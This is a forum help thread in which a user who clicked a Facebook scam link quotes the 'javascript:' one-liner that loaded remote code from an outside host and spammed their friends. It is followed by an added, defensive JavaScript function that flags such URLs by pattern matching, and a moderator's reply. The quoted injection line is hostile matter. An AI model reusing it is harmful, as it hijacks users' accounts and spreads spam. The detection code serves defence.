Pests of all kinds and how to combat them: Clicked on a Facebook scam page - "StalkerTools" - computer now infected?

23.02.2011, 18:33   #1
Cassiopeia26
 
Hello,

due to an inexcusable mental blackout I clicked a link on Facebook and caught a script, and I don't know exactly what it did. In any case, it posted to my friends' walls and also sent messages to them...
It is the following JavaScript:
Quote:
javascript: (a = (d = document).createElement("script")).src = "hxxp://myprochecker.info/StalkerTools.fb"; void(d.body.appendChild(a))
The script:
I am now worried about which data the script read out of Facebook and whether it installed malware on my computer.
Please, can someone explain the code to me?

I am really very panicked right now. In parallel, I am having AntiMalwareBytes scan my computer.
What else do I need to do now?

HELP!

Thanks in advance,
Cassiopeia26
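
The one-liner quoted in the post above is a `javascript:` URL that creates a `<script>` element and points its `src` at a third-party host, so the remote code runs inside the page that is open at that moment. The following is an added example, not part of the original post or thread, that flags such pasted strings by pattern matching alone without evaluating them; `triageJavascriptUrl`, `refang`, `defang` and the trusted-domain parameter are hypothetical names.

```javascript
// Static triage of a pasted "javascript:" URL. Nothing is evaluated or fetched:
// the text is only pattern-matched. All function names here are hypothetical.

// Sample built from the one-liner quoted in the post (scheme left defanged as hxxp).
const SAMPLE =
  'javascript: (a = (d = document).createElement("script")).src = ' +
  '"hxxp://myprochecker.info/StalkerTools.fb"; void(d.body.appendChild(a))';

// Turn a defanged indicator back into a parseable URL (used for parsing only).
function refang(s) {
  return s.replace(/^hxxp(s?):\/\//i, 'http$1://').replace(/\[\.\]/g, '.');
}

// Defang a URL so it can be shown in tickets and logs without being clickable.
function defang(s) {
  return s.replace(/^http(s?):\/\//i, 'hxxp$1://').replace(/\./g, '[.]');
}

// trustedSuffix: the registrable domain of the site the user is on (assumption:
// the caller knows it, e.g. "facebook.com").
function triageJavascriptUrl(text, trustedSuffix) {
  const result = {
    isJavascriptUrl: false, createsScript: false, appendsToDom: false,
    remoteSources: [], verdict: 'ignore',
  };
  // The scheme is case-insensitive and leading whitespace/control chars are ignored.
  const m = /^[\s\u0000-\u001f]*javascript:/i.exec(text);
  if (!m) return result;
  result.isJavascriptUrl = true;
  const body = text.slice(m[0].length);

  result.createsScript = /createElement\s*\(\s*["']script["']\s*\)/i.test(body);
  result.appendsToDom = /\.(appendChild|insertBefore|append)\s*\(/.test(body);

  // Collect every string literal assigned to a .src property.
  const srcRe = /\.src\s*=\s*(["'])(.*?)\1/g;
  let s;
  while ((s = srcRe.exec(body)) !== null) {
    let host = null;
    try {
      host = new URL(refang(s[2])).hostname.toLowerCase();
    } catch (e) {
      // Relative or malformed value: no host to compare.
    }
    const offOrigin = host !== null &&
      !(host === trustedSuffix || host.endsWith('.' + trustedSuffix));
    result.remoteSources.push({ url: defang(refang(s[2])), host, offOrigin });
  }

  // A script element whose source is off the trusted domain is the pattern
  // shown in the post; any other javascript: URL is left for manual review.
  const loadsForeign = result.remoteSources.some((r) => r.offOrigin);
  result.verdict = result.createsScript && loadsForeign ? 'block' : 'review';
  return result;
}
```

The check is purely textual, so a `javascript:` URL that assembles its target at run time comes back as `review` rather than `block`.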

24.02.2011, 11:08   #2
cosinus
Please note => http://www.trojaner-board.de/95173-b...es-posten.html and http://www.trojaner-board.de/69886-a...-beachten.html